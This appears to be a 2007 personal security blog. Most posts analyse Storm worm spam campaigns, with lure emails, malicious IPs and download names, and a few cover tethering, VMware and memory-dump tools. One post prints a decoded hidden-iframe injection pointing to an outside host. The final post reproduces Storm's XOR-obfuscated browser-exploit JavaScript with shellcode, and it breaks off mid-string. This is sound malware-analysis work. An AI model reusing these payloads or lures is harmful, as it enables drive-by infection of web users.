These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone with modem. If you don't know how, read the forum post that got me this far. The forum works great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.

Username: PHONE_NUMBER@vzw3.com (not sure how important this is, I've done it with the BlackBerry Internet Server username also)
Password: vzw
Telephone: #777

Advanced button
Vendor: Generic
Model: Dialup Device
(Leave the rest as defaults)

Ruby snippet for URI decoding

2007-11-02T15:50:00.000-04:00

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stephen's modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:

eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Which this:

ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

Returns this:

"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)

2007-10-24T23:53:00.000-04:00

Note to self:
sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server

I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.

Play that funky mus...stock spam, Storm

2007-10-18T09:58:00.000-04:00

Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".

Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.

coolringtone.mp3
firstdance.mp3

Because there is no patch...

2007-10-17T13:50:00.000-04:00

...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab and antivirus companies but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.

Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!

Below are samples of the e-mails, screenshots and the javascript exploits.

Subject:re: krackin is released
Body:New Sharing network goes live. Check out Krackin here.
http://xx.90.44.73/

Subject:re: krackin is online
Body:Ok, last time I am sending you this linkman. LOL write it down or
soothing. This is krackin. http://xx.74.85.128/

Subject:man here is the link
Body:man here is the next huge sharing network. It is friggin awesome. Check
it out. http://xx.37.24.109/

Here's a text file of the javascript exploit code. Handle with care!

Kitties say Storm is better than catnip!

2007-10-11T22:12:00.000-04:00

Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.

Subject: You have just received an ecard.
Body: Check out the original Crazy Cat Card. It is too funny for words.
http://75.4.70.217/

Subject: Check out your ecard.
Body: Click here to view your laughing kitty card online. http://74.138.11.91/

Subject: You've got a greeting just for you!
Body: Please click here to view your Crazy Kitty Card Online.
http://99.162.220.182/

Here's a screenshot of the page:

After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found the the original file came from http://www.superlaugh.com/1/catnip.swf Both files were the same size but MD5's did not match.

movie 'catnip.swf' {
// flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
frame 1 {
ifFrameLoaded (4) {
gotoAndPlay(3);
}
}
frame 2 {
gotoAndPlay(1);
}
movieClip 5 {
}
button 7 {
on (release) {
getURL('http://www.superlaugh.com', '_top');
}
}
movieClip 14 {
}
frame 125 {
gotoAndPlay(3);
}
}

The links on the page all go to SuperLaugh.exe which was caught by 70% of scan engines on Virus Total. Obfuscated Javascript was found at the bottom just like some previous versions. It looked to be the same exploits that have been being used on and off since I first started looking into Storm about a month or two ago.

Also, all the images, including the kitty Flash file, were sourced from the "/img" directory but it did not allow browsing of directories.

Links for AITP and FAEDS presentations

2007-09-25T22:20:00.000-04:00

Thank all of you for attending my presentation. If you have any questions, please don't hesitate to e-mail me. Here are links to many of the things I talked about and demonstrated along with several that I didn't have time to get to.

My Websites
-----------------------------------
Personal Blog
http://www.johnhsawyer.com

Dark Reading Blog
http://www.darkreading.com/blog.asp?blog_sectionid=447

UF IT Security Team
http://infosec.ufl.edu

Malware Analysis and Sandboxes
-----------------------------------
VirusTotal (submit files for analysis)
http://www.virustotal.com/

CWSandbox - Behavior-based Malware Analysis
http://www.cwsandbox.org/

Anubis: Analyzing Unknown Binaries
http://analysis.seclab.tuwien.ac.at/index.php

Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en

Mandiant Red Curtain
http://www.mandiant.com/mrc

PEiD
http://www.secretashell.com/codomain/peid/

pefile (for you Python programmers)
http://dkbza.org/pefile.html

Firefox Extensions and SpiderMonkey
-----------------------------------
NoScript
http://noscript.net/

User Agent Switcher
http://chrispederick.com/work/web-developer/

WebDeveloper
http://chrispederick.com/work/web-developer/

SpiderMonkey
http://www.mozilla.org/js/spidermonkey/

Incident Response Tools (& more)
-----------------------------------
Sysinternals
http://www.microsoft.com/technet/sysinternals/default.mspx
(autoruns, tcpview, filemon, regmon, process moniopenports, tor, process explorer, pstools)
Sysinternals Suite (all tools in one download)
http://www.microsoft.com/technet/sysinternals/Utilities/SysinternalsSuite.mspx

DiamondCS
http://www.diamondcs.com.au/consoletools.php
(cmdline, openports)

Wireshark - sniffer and protocol analzer (formerly Ethereal)
http://www.wireshark.org

Helix - CD designed for incident response and forensics (Linux & Windows tools)
http://www.e-fense.com/helix/

Some Security Blogs
-----------------------------------
SANS Internet Storm Center
http://isc.sans.org

Windows Incident Response (Harlan Carvey) - event logs, registry and memory analysis & more
http://windowsir.blogspot.com/

int for(ensic){blog;} (Andreas Schuster) - event logs and memory analysis
http://computer.forensikblog.de/en/

Centralizing Windows Event Logs
-----------------------------------
Series of Posts on DarkReading about logs:
Log Central
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132446
How to Centralize Windows Event Logs (links to Snare and Lasso)
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132709
Watch Out for That Log!
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=133005

Miscellaneous Links
-----------------------------------
Metasploit Framework
http://framework.metasploit.com/

VMware (Workstation for Linux & Windows, Fusion for Mac, Server and Player are FREE )
http://www.vmware.com

Process memory dumping tools

2007-09-20T16:54:00.000-04:00

This is from a post I had over at ForenisFocus.com. I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post. So, I stuck it here for my own future reference.

Everyone already knows about dd for Windows from George M. Garner so I won't discuss it any further. Until, the tools like those developed in the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them.

There is some promising research from Mariusz Burdach who just spoke at BlackHat Federal 2006 on "Finding Digital Evidence in Physical Memory." His website is located at http://forensic.seccure.net/ but his documentation memory forensics is more up-to-date on the BlackHat Media Archives page. The tools/docs archive even has the Windows version of wmft.exe which isn't on his webpage yet (just the linux version of wmft is there).

Memdump was mentioned but there are at least two different versions for Windows that I know of. The one mentioned previously by APsoft and another from the Metasploit project.

APsoft's memdump will do any or all of memory.

MEMDUMP/386 for DOS Version 2.00 - Release 15-Jun-2005
(C) Copyright 1993-2005 by APSoft (http://www.tssc.de)
All rights reserved.  Disassembly or decompilation prohibited.

This program dumps or copy any part of 4GB memory address space of your system.
For proper access to hardware registers, memory can be read with BYTE, WORD or
Double WORD granularity.

Syntax: MEMDUMP [/H|?]
                [/D[B|W|D][:Address[,Length]]]
                [/F:filename|none]
                [/B:filename]

 where: /H              - Print this text
        /D[B|W|D][:Address[,Length]]
                        - Dump <Length> number of memory bytes from specified
                          linear <Address> as bytes (DB), words (DW) or
                          double words (DD) correspondingly.
        /F:filename     - Output file for the dump (Default: console)
                          Use /F:none to completely suppress dump
        /B:filename     - Output file for the binary contents of memory

 Notes: Both 'Address' and 'Length' can be expressed in hexadecimal format
        with '0x' prefix. The 'Length' field can be also expressed in decimal
        Examples:

          MEMDUMP /DW:0x100000,0x100000 /F:2ndMB.dmp - dump second MB to file
          MEMDUMP /DB:0x100000,128                   - dump 128 Bytes to CON:
          MEMDUMP /D:0,0x100 /F:none /B:IntTB.bin    - copy INT table to file

        If dump or binary file exists, MEMDUMP unconditionally overrides it.

        If you are using WORD or DWORD access 'Length' parameter should be
        multiple of 2 or 4 correspondingly.

        Please remember that if the memory manager (such as EMM386.EXE) is
        loaded, MEMDUMP will read linear address rather as physical address.

There is almost no help for the Metasploit memdump. It dumps specific processes by giving it a PID and creates quite a few files that are to be analyzed with msfpescan. The file names looks to be based on the section of memory it is pulled from. Msfpescan is crashing on my Mac OS X box right now so can't show you the output but here is the syntax and sample of memdump running.


C:\>y:\memdump.exe
Usage: y:\memdump.exe pid [dump directory]

C:\>y:\memdump.exe 2796
[*] Creating dump directory...2796
[*] Attaching to 2796...
[*] Dumping segments...
[*] Dump completed successfully, 49 segments.

Then, there is pmdump that also dumps processes.


pmdump 1.2 - (c) 2002, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
           - http://ntsecurity.nu/toolbox/pmdump/

Usage: pmdump <pid> <filename>
        - dumps the process memory contents to a file

       pmdump -list
        - lists all running processes and their PID's

Microsoft has several versions of userdump but I think the latest is version 8.0 and is less than a month old. As with Metasploits memdump, there is another tool that can read the dumped output. Dumpcheck is that tool and is part of the debugging tools package. For it to be most useful, you need the symbols, also.


User Mode Process Dumper (Version 8.0.2826.0)
Copyright (c) 1999-2005 Microsoft Corp. All rights reserved.

userdump -p
    Displays a list of running processes and process IDs.

userdump [-k] <ProcessSpec> [<TargetDumpFile>]
    Dumps one process or processes that share an image binary file name.

    -k optionally causes processes to be killed after being dumped.

    <ProcessSpec> is a decimal or 0x-prefixed hex process ID, or the
        base name and extension (no path) of the image file used to create
        a process.

    <TargetDumpFile> is a legal Win32 file specification. If not specified,
        dump files are generated in the current directory using a name
        based on the image file name.

userdump -m [-k] <ProcessSpec> [<ProcessSpec>...] [-d <TargetDumpPath>]
    Same as above, except dumps multiple processes.

    -d <TargetDumpPath> supplies the directory where the dumps will go.
        The default is the current directory.

userdump -g [-k] [-d <TargetDumpPath>]
    Similar to above, except dumps Win32 GUI apps that appear hang.

userdump -I [-d <TargetDumpPath>]
    To change just in time debugger to UserDump.
    This command will not actually start UserDump.
    If you don't setup userdump, please copy userdump.exe to %windir%\system32.

    -d <TargetDumpPath> supplies the directory where the dumps will go.
        The default is a current directory of the target process.

That's it that I can think of for now. I will probably remember the other one or two tonight. Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area.

MSN bot making the rounds

2007-09-18T10:58:00.000-04:00

It has handy commands like main.wget, main.remove, msn.url, msn.self and msn.stop.

If you get one of the following and it includes a link to a site like photobucket.com or similar, don't click it. This came straight from a txt file an IRC bot was using as its source of deceptive messages being sent to MSN users.

This picture isnt you... right?
Wow i think i found your pic on myspace!
hey did i ever show you this picture of me?
can i up some of these pics of ya to my myspace profile?
you care if i put this pictuer of you in my new album?
sry about the messup i fixed the pic! Try it one more time plz
Can i put this pic of you into my new myspace album?
this looks like you lol
haha this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone
Wanna see my pics before i send em to facebook?
do you think this picture is too kinky for Myspace?
I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.
Have you seen me Naked Yet :D
ok I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol
hey you got a myspace album? anyways heres my new myspace album :) accept k?
do I look dumb in this picture? I want to put it on myspace.

Storm brings "games" that pack a punch

2007-09-15T17:09:00.000-04:00

Today, Storm includes e-mails about free games available. The e-mails are resorting back to including URLs to IP addresses and not a domain like the most recent NFL messages. The web page includes pictures of all sorts of games and links to "ArcadeWorld.exe".

The Storm worm folks are also resorting to including exploit code. My guess is they just didn't get the number of infections they were hoping to with just including links to the *.exe with the NFL version.
Here's a screenshot of the obfuscated javascript.

This is after the first round of deobfuscating the javascript using SpiderMonkey. See how there's still more to analyze. The overly long filename for the WMV file looks like it is targeting MS06-006.

The do/while loop creates a string of 16,777,216 A's that gets the shellcode appended to the end.

Subject: Quick, grab this
Body: Click here to get over 1000 games for free http://xxx.0.188.5/

Subject: Quick, grab this
Body: Stop paying for games; we have over 1000 games for free online http://xx.57.250.77/

Subject: Thousands of hours of fun, for free
Body: Go http://xx.203.41.160/

Subject: Stop paying for games
Body: 1000 Online Free games, take a look http://xx.38.52.177/

Subject: The internet just got better
Body: Look http://xxx.54.195.27/

freeNFLtracker.com now in use by Storm worm

2007-09-13T14:02:00.000-04:00

Messages just started pouring in with links to http://freeNFLtracker.com/ instead of individual IP addresses. If you can blackhole the DNS, do so immediately to prevent users from being able to resolve the domain.

There is still no exploit code in the webpage, but it probably won't be long before it is included. I'm guessing the current page is so effective at getting users to click and run that there isn't a need for automatic exploitation.

Subject: Are you ready for football season?
Body: Want to know all the stats all the time this season? Get your free NFL Season Tracker!
http://freeNFLtracker.com/

Subject: Are you ready for football season?
Body: Are you ready for tonight's game? How about the whole season? Do you have your NFL Season Tracker?
http://freeNFLtracker.com/

Subject: The season has started
Body: Know every player and every stat, with this years Real-time NFL Tracker.
http://freeNFLtracker.com/

Here's the registrar info for FREENFLTRACKER.COM. For obvious reasons, they're using a privacy service to block the real registrant info.

Registration Service Provided By: LOMTI INC.
Contact: +351.3456712

Domain Name: FREENFLTRACKER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 65
All Postal Mails Rejected, visit Privacyprotect.org
Monster
null,2680 AB
NL
Tel. +45.36946676

Creation Date: 13-Sep-2007
Expiration Date: 13-Sep-2008

Domain servers in listed order:
ns13.freenfltracker.com
ns12.freenfltracker.com
ns11.freenfltracker.com
ns10.freenfltracker.com
ns9.freenfltracker.com
ns8.freenfltracker.com
ns7.freenfltracker.com
ns6.freenfltracker.com
ns5.freenfltracker.com
ns4.freenfltracker.com
ns3.freenfltracker.com
ns2.freenfltracker.com

Go! Fight! Storm..uhm..Score!

2007-09-08T16:53:00.000-04:00

Just in time for football season, Storm worm is now targeting football fans with a free online game tracker. The page is much more elaborate than any of the others so far with more graphics, a table and an image map. Every link on the page goes to "tracker.exe" and there is no obfuscated javascript or exploit code in the page itself. It is solely relying on users to click and run the "tracker.exe".

Subject: FOOTBALL! Are You ready?
Body: Football Season Is Finally here!
Never miss a game again, and know all the stats.
Get you data online everyday from our free game tracker:
http://xx.179.106.14/

Subject: Free NFL Game Tracker
Body: Are you ready for some football?
Let us keep you on top of every game everyday.
Never be in the dark again with this online game tracker:
http://xx.8.83.172/

Subject: Do you have your NFL Game List?
Body: Football is back, Life may resume again!
We can keep you on top of every single game this season.
Get all your game info daily from our online game tracker:
http://xx.248.200.167/

Subject: Are you ready for some football?
Body: Life as we know it is back, NFL season is open.
Let us keep you on top of every game everyday.
Get all your game info daily from our online game tracker:
http://xx.211.219.222/

sTORm preying on file sharers

2007-09-06T09:22:00.000-04:00

This came in at 7:02am this morning after about two days of nothing new from Storm. Now they are promoting Tor for file sharers to protect themselves from "Big Brother." Tor anonymizes online activity by encrypting and tunneling network traffic through random Tor exit nodes all around the world. It is nice to see Tor getting some recognition, but hopefully, it won't lead to too many new infections.

Here's a copy of the e-mail and a screenshot of the page.

Subject: Big brother is watching you.
Body: Do you trade files online? Then they will come after you. The news is full of articles of lawsuits by the RIAA. This program protects your online identity. Save yourself from an attack and use this free software now. Download Tor

A Stormy Labor Day celebration

2007-09-04T16:52:00.000-04:00

I did have a stormy Labor Day weekend in Hilton Head over the long holiday weekend, but my Inbox also received new copies of Storm worm hoping to trick users into infecting themselves. They either tell users they have a new e-card or there is a holiday greeting card waiting for them. The host with the malicious content has a cute Labor Day picture that links to "labor.exe"

All the same nasty obfuscated Javascript exploit code is still there and doesn't appear to have changed from what we were seeing last week.

Subject: Happy Labor Day
Body: Someone has sent you an E-Card. To view it, follow this link: http://ecards.com/funcard/edelivery?xz2dl2ifbi6r80hzk

Subject: The Big Labor Day Weekend
Body: Here is the link to view your holiday greeting online: http://hallmark.com/ecards/labor1?j7hesyq65ubntze680a1p67969wt2

Subject: Your friend has sent you a card.
Body: Click here to pick up your greeting card: http://netcards.com/cards/edelivery?p9n2q90enz4afj0

I do most of my javascript deobfuscation using technique #4 as detailed by Daniel Wesemann on the SANS Internet Storm Center site (http://isc.sans.org). I'll probably go over how I do it in a little more detail in an upcoming post.

Quick template mod

2007-08-30T11:22:00.000-04:00

I had to mod the Blogger template because it was feeling a bit restrictive and making the long posts scroll. Personally, I read blogs through Google Reader but there is still a lot of people that go straight to the blog site so this should make it easier for all of you.

Also, I was thinking of changing the title of the blog. Right now, it is "John H. Sawyer" which is because I'm too lazy to have come up with an original one. My DarkReading blog is called "Evil Bits" which Ben told me yesterday should be called "Naughty Bits." ;-) Thanks, Ben. Any ideas for blog titles?

Rock bands get a little Storm love

2007-08-29T10:45:00.000-04:00

Whether that is good or bad, I'm sure it's going to make some college students and teens want to click on it. Two messages made it through this morning (see below). Today's Storm executable is "codec.exe". Even though the Storm worm host is serving up "codec.exe" as the current trick to get users to install (if they don't get owned by the embedded exploits first), it still usually hosts other EXE's based on previously seen names like "applet.exe", "video.exe", etc. The obfuscated javascript and exploits look to be the same as yesterday.

On this host, I was able to pull both "video.exe" and "codec.exe" but not "applet.exe"--at least, not a Storm binary. (I didn't bother trying the other half dozen filenames used in the past).

Here's there file sizes, md5's and content of the page returned by the "applet.exe" request.

140367 Aug 29 10:52 codec.exe
140367 Aug 29 10:52 video.exe
529 Aug 29 10:52 applet.exe

MD5 (applet.exe) = 37fe7efbebfe417c25a92f76d163ea3b
MD5 (codec.exe) = 1ef03f4830c530799c57d67e1ccadc59
MD5 (video.exe) = 1ef03f4830c530799c57d67e1ccadc59

applet.exe: HTML document text
codec.exe: MS-DOS executable (EXE), OS/2 or MS Windows
video.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Page content returned from "applet.exe" request.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.17</center>
</body>
</html>

And, here's the content of the new e-mails.

Subject: Hot new video
Body: Foo Fighters just made a video you have got to see.

Be the first to see it. Click on the link to pull it off my server:
http://xx.25.176.66/

and

Subject: this video rockx
Body: Velvet Revolver
Check it out first. Go here for the video: http://xx.106.206.111/

Just got this one...

Subject: this video is not out yet
Body: Fat Boy just filmed their new video.

Be the first to see it. Click here to download it: http://xxx.211.45.200/

Storm takes one step back, six steps forward

2007-08-28T11:58:00.001-04:00

I was getting bummed since I hadn't seen any Storm worm infection letters since yesterday around 3pm, but Storm worm loves me and would never leave me hanging. This just came in.

Subject: Helps us out and let us say thanks
Body: We are looking for Consumer opinions of our new software Home Reno Planner

This beta testing will enable us to fine tune the software for public release. A free copy of the program plus free updates will be yours for helping out.

Download the software, See What you think, and Email us your thoughts. If you would like to help us with this no obligation Beta test, follow this link to our secure download server: http://xx.183.196.147/setup.exe

Where is the obfuscated link to the IP? I was surprised to see the raw IP listed along with a link directly to an EXE. It is definitely Storm worm hosting the malware. A quick download and check of the server header shows:

HTTP/1.1 200 OK
Server: nginx/0.5.17
Date: Tue, 28 Aug 2007 14:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 140367
Connection: close
Accept-Ranges: bytes

Bringing up http://xx.183.196.147/ without the "setup.exe" shows it is also doubling as a StormTube host complete with obfuscated Javascript that contains a shotgun approach to exploiting the web browser. A cursory glance show about a half dozen exploits that may be for IE WebViewFolderIcon setSlice(), WinZip WebViewFolderIcon, Yahoo WebCam, Microsoft 'msdds.dll' COM Object, QuickTime and AdobeWScriptShell.
Since including code in the body of the blog is a pain, here's the files if you want to play with them.

Wish List: PE Posters

2007-08-28T10:25:00.001-04:00

Ero Carrera has created a CafePress store to sell poster-sized versions of his "Portable Executable Format: A File Walkthrough" and "Portable Executable Format."

How hot are these? Check out his blog post about it for more info.

The Ever Changing Storm

2007-08-23T10:51:00.000-04:00

Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they learned that users might not click on an IP address so they've obfuscated it with HTML.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or...there's just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their header:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails don't have any mail client info. The Storm worm host directed to by the e-mail does have some obfuscated javascript with exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\x